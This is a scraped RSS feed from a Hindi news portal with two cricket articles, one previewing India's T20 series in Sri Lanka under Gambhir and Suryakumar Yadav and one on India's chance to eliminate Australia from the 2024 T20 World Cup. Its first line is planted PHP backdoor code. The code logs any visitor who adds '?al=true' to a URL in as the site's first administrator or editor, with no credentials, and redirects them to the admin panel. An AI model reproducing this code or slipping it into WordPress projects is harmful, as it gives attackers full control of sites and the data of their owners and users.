// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); The Indian team – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 27 Jul 2024 09:06:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 सूर्यकुमार और गंभीर के नए युग में दबदबा बरकरार रखने के लिए उतरेगा भारत https://pratyushaashakinayikiran.com/?p=54890 Sat, 27 Jul 2024 09:06:00 +0000 https://pratyushaashakinayikiran.com/?p=54890 पालेकल (श्रीलंका)
गौतम गंभीर और सूर्यकुमार यादव की नवनियुक्त कोच और कप्तान की जोड़ी के साथ भारतीय टीम श्रीलंका के खिलाफ शनिवार से यहां शुरू होने वाली तीन टी20 अंतरराष्ट्रीय मैचों की श्रृंखला में अपनी विशेष छाप छोड़ने की कोशिश करेगी। दो बार के विश्व कप विजेता गंभीर मुख्य कोच के रूप में जबकि टी20 के सर्वश्रेष्ठ बल्लेबाजों में से एक सूर्यकुमार खेल के इस छोटे प्रारूप में कप्तान के रूप में अपनी नई पारी शुरू करेंगे। गंभीर आईपीएल में कप्तान और मेंटर (मार्गदर्शक) के रूप में काफी सफल रहे हैं। वह राहुल द्रविड़ की जगह लेंगे जिनके कोच रहते हुए भारत ने अच्छी सफलताएं हासिल की थी। द्रविड़ के मुख्य कोच रहते हुए भारत ने आईसीसी प्रतियोगिताओं में तीनों प्रारूप के फाइनल में जगह बनाई तथा गंभीर को अब इन सफलताओं को नए मुकाम पर पहुंचाना होगा।

सूर्यकुमार को कप्तान बनाना थोड़ा हैरानी भरा फैसला रहा क्योंकि रोहित शर्मा के टी20 अंतरराष्ट्रीय क्रिकेट से संन्यास लेने के बाद हार्दिक पंड्या को इस पद का प्रमुख दावेदार माना जा रहा था। चयन समिति ने सूर्यकुमार के कप्तान के रूप में कम अनुभव को नजरअंदाज करके उन्हें टीम की कमान सौंपी है। अगला टी20 विश्व कप 2026 में भारत और श्रीलंका की संयुक्त मेजबानी में खेला जाएगा तथा चयनकर्ताओं के पास उसके लिए टीम तैयार करने के लिए अभी काफी समय है। भारतीय टीम में यह बदलाव पिछले महीने विश्व कप जीतने तथा रोहित, विराट कोहली और रविंद्र जडेजा के टी20 अंतरराष्ट्रीय क्रिकेट से संन्यास लेने के बाद आया है। भारतीय टीम जब परिवर्तन के दौर से गुजर रही है तब सीमित ओवरों की टीम के उप कप्तान शुभमन गिल इसे अपनी जगह पक्की करने के अवसर के रूप में देख रहे होंगे। केवल वही नहीं यशस्वी जायसवाल, रिंकू सिंह और यहां तक कि रियान पराग जैसे अन्य खिलाड़ी भी ऐसा करना चाहेंगे।

अक्षर पटेल टीम में जडेजा की जगह लेने के लिए पूरी तरह से तैयार हैं। उनके अलावा भारत के पास हार्दिक, शिवम दुबे और वाशिंगटन सुंदर के रूप में अच्छे ऑलराउंडर भी मौजूद हैं। जसप्रीत बुमराह को इस दौरे से विश्राम दिया गया है तथा उनकी अनुपस्थिति में अर्शदीप सिंह और मोहम्मद सिराज यहां की तेज गेंदबाजों के अनुकूल परिस्थितियों का पूरा लाभ उठाकर टीम में अपनी जगह मजबूत करना चाहेंगे। जहां तक श्रीलंका की बात है तो वह तेज गेंदबाजी विभाग में कमजोर नजर आता है क्योंकि उसके दो अनुभवी गेंदबाज दुष्मंथा चमीरा (ब्रोंकाइटिस और श्वसन संक्रमण) और नुवान तुषारा (उंगली में फ्रैक्चर) श्रृंखला से बाहर हो गए हैं। उनकी जगह असिथा फर्नांडो और दिलशान मदुशंका को टीम में लिया गया है। श्रीलंका के टी20 विश्व कप में जल्दी बाहर होने के बाद कप्तान वानिंदु हसरंगा, कोच क्रिस सिल्वरवुड और सलाहकार कोच महेला जयवर्धने ने अपना पद छोड़ दिया था।

श्रीलंका ने सनथ जयसूर्या को अंतरिम कोच नियुक्त किया है जिन्होंने अपनी टीम को भारत के स्टार खिलाड़ियों की अनुपस्थिति का पूरा फायदा उठाने के लिए कहा है लेकिन वह अपनी टीम की कमजोरी से भी अच्छी तरह वाकिफ हैं। भारत की तरह श्रीलंका भी नए दौर की शुरुआत करेगा। उसने कप्तानी की जिम्मेदारी अनुभवी बल्लेबाज चरिथ असलांका को सौंपी है। श्रीलंका घरेलू परिस्थितियों का लाभ उठाकर जीत हासिल करना चाहेगा। उसके पास कई अनुभवी खिलाड़ी है जिनमें पूर्व कप्तान दासुन शनाका, कुसल परेरा, कुसल मेंडिस और दिनेश चांदीमल शामिल हैं।

टीम इस प्रकार हैं:
भारत:
सूर्यकुमार यादव (कप्तान), शुभमन गिल, यशस्वी जायसवाल, रिंकू सिंह, रियान पराग, ऋषभ पंत (विकेटकीपर), संजू सैमसन (विकेटकीपर), हार्दिक पंड्या, शिवम दुबे, अक्षर पटेल, वाशिंगटन सुंदर, रवि बिश्नोई, अर्शदीप सिंह, खलील अहमद, मोहम्मद सिराज।

श्रीलंका: दिनेश चांदीमल, अविष्का फर्नांडो, कुसल मेंडिस (विकेटकीपर), पथुम निसांका, कुसल परेरा, चरिथ असलांका (कप्तान), वानिंदु हसरंगा, कामिंडु मेंडिस, दासुन शनाका, चामिंडु विक्रमसिंघे, बिनुरा फर्नांडो, असिथा फर्नांडो, दिलशान मदुशंका, मथीशा पथिराना, महेश थीक्षाना, डुनिथ वेलालगे।

मैच भारतीय समयानुसार शाम 7:00 बजे शुरू होगा

 

]]>
भारतीय टीम के पास ऑस्ट्रेलिया से बदला लेने का मौका आ गया, अपने रास्ते से हटाना चाहेगी ‘ब्लू ब्रिगेड’ https://pratyushaashakinayikiran.com/?p=44555 Sun, 23 Jun 2024 15:55:00 +0000 https://pratyushaashakinayikiran.com/?p=44555 नई दिल्ली
अगर आप भारतीय क्रिकेट टीम के फैन हैं तो आपको 19 नवंबर 2023 की वो रात याद होगी, जब भारतीय टीम को अहमदाबाद के नरेंद्र मोदी स्टेडियम में आईसीसी क्रिकेट वर्ल्ड कप 2023 के फाइनल में ऑस्ट्रेलिया से हार मिली थी। भारतीय टीम के खिलाड़ी ही नहीं, बल्कि हर किसी की आंखें उस दिन नम थीं। हालांकि, अब ऑस्ट्रेलिया से बदला लेने का मौका आ गया है। भारतीय टीम ऑस्ट्रेलिया की टीम को टी20 वर्ल्ड कप 2024 से बाहर कर सकती है।

दरअसल, वेस्टइंडीज में इस समय टी20 वर्ल्ड कप 2024 के सुपर 8 के मैच खेले जा रहे हैं। रविवार 23 जून को ऑस्ट्रेलिया को अफगानिस्तान से हार का सामना करना पड़ा। इस हार से ऑस्ट्रेलिया की टीम के सेमीफाइनल में पहुंचने के चांस कम हो गए हैं। अगर भारतीय टीम 24 जून को सुपर 8 के अपने आखिरी मैच में ऑस्ट्रेलिया को हरा दे ते काफी हद तक ऑस्ट्रेलिया की टीम टूर्नामेंट से बाहर हो जाएगी। ऐसे में भारत के पास बदला लेने का मौका।

अगर टीम इंडिया ने ऑस्ट्रेलिया को हराया और उसी रात अफगानिस्तान ने बांग्लादेश को सुपर 8 के आखिरी मैच में हरा दिया तो ऑस्ट्रेलिया की टीम सेमीफाइनल में प्रवेश नहीं कर पाएगी। अगर ऑस्ट्रेलिया ने मुकाबला जीता तो फिर अफगानिस्तान को नेट रन रेट में ऑस्ट्रेलिया को पीछे छोड़ने के लिए बड़े अंतर से जीत दर्ज करनी होगी, जो कि वेस्टइंडीज की परिस्थितियों में काफी मुश्किल काम है। ऐसे में भारतीय टीम बदला लेना चाहेगी।

भारत को एक और फायदा
आपकी जानकारी के लिए बता दें, भारत ने जब-जब वनडे विश्व कप या टी20 विश्व कप जीता है, तब-तब ऑस्ट्रेलिया की टीम सेमीफाइनल या उससे पहले ही बाहर हो चुकी है। यहां तक कि भारतीय टीम ने ही ज्यादातर मौकों पर ऑस्ट्रेलिया को बाहर किया है। 1983 के विश्व कप की बात करें तो ग्रुप स्टेज में भारत ने ऑस्ट्रेलिया को हराया था। 2007 के टी20 विश्व कप में भारत सेमीफाइनल में ऑस्ट्रेलिया से जीता था और 2011 के वर्ल्ड कप में क्वॉर्टर फाइनल में भारत जीता था।

ऐसे में भारतीय टीम अगर ऑस्ट्रेलिया को अपने रास्ते से हटा दे तो फिर भारतीय टीम के लिए टी20 विश्व कप जीतना आसान हो सकता है, क्योंकि अगर ऑस्ट्रेलिया और भारत की टीम सेमीफाइनल में पहुंचती हैं और दोनों अपने-अपने सेमीफाइनल जीत जाती हैं तो फिर से भारत और ऑस्ट्रेलिया की भिड़ंत फाइनल में होगी। वहां कुछ गड़बड़ ना हो, इसके लिए भारतीय टीम को अभी ऑस्ट्रेलिया को अपने रास्ते से हटाने का पूरा जोर लगाना होगा और बड़े अंतर से ऑस्ट्रेलिया को हराना होगा।

 

]]>